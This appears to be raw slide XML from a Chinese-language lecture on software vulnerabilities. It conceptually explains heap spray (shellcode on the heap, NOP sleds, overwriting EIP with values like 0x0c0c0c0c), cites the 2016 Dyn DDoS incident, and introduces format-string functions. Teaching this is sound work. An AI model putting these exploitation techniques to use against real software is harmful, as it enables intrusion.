              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用栈溢出和堆溢出结合的一个技术，可在很大程度上解决溢出攻击在不同版本上的不兼容问题，并且可以减少对栈的破坏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在浏览器相关溢出中使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击思想广泛应用于其他类型攻击中，如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JIT Spray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ActivexSpray</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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89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技术关键</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>放置到堆中，然后在栈溢出时，控制函数执行流程，跳转到堆中执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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攻击原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819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假设“地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的起始地址，“地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>”表示在缓冲区溢出中用于覆盖的函数返回地址，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B&lt;A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，则可在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之间插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这样的指令，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>之间的这些指令，就可以继续执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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利用软件漏洞攻击的实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="矩形 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="698500" y="1773238"/>
            <a:ext cx="7705725" cy="2676525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>黑客入侵、控制了全世界十多万台智能硬件设备，组成了僵尸网络，对美国互联网域名解析服务商</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>导致了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、亚马逊、华尔街日报等数百个重要网站无法访问，美国主要公共服务、社交平台、民众网络服务瘫痪。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网络安全协议的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10245" name="矩形 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="425450" y="977900"/>
            <a:ext cx="3859213" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>美国断网事件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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浏览器中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Heap Spray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829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使用脚本语言定义大量对象，内容为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过大量堆申请将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>放到堆中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用漏洞，将一个固定的值（常常为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x0c0c0c0c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x0a0a0a0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等）放入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>巧妙地布局保证极大概率的撞击成功率</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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Heap Spray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>过程示意</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8397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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="1196975"/>
            <a:ext cx="1512888"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shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1423988" y="2132013"/>
            <a:ext cx="1512887"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固定地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411413" y="4292600"/>
            <a:ext cx="115252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EIP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="1196975"/>
            <a:ext cx="24479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大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="1916113"/>
            <a:ext cx="244792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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="2636838"/>
            <a:ext cx="244792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大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="3357563"/>
            <a:ext cx="2447925"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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="4797425"/>
            <a:ext cx="24479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大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="5516563"/>
            <a:ext cx="244792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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="4076700"/>
            <a:ext cx="244792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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="肘形连接符 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2268538" y="1557338"/>
            <a:ext cx="2951162" cy="4319587"/>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a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3779838" y="3716338"/>
            <a:ext cx="143986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直接箭头连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3778250" y="2276475"/>
            <a:ext cx="144145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肘形连接符 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1395413" y="3636963"/>
            <a:ext cx="1800225" cy="23177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直接箭头连接符 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3563938" y="2997200"/>
            <a:ext cx="1655762" cy="16557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格式化串漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="849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2800"/>
              <a:t>有哪些格式化函数？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>：将格式化的数据打印至文件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>：将格式化的数据打印至标准输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>：将格式化的数据存储到缓冲区中；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>：将指定长度的格式化数据存储到缓冲区中；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vfprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>：将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>va_arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>结构中的格式化数据打印到文件；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>：将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>va_arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>结构中的格式化数据打印到标准输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>：将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>va_arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>结构中的格式化数据存储到缓冲区中；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vsnprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>：将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>va_arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>结构中指定长度的格式化数据存储到缓冲区中；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:xfrm>
            <a:off x="436563" y="877888"/>
            <a:ext cx="8229600" cy="5818187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%c          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>单字符格式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%d          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>十进制整型 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>(pre ANSI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>e,%E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>指数形式的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>float or double</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%f          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>十进制 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>float or double</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>%I          </a:t>
            </a:r>
            <a:r>
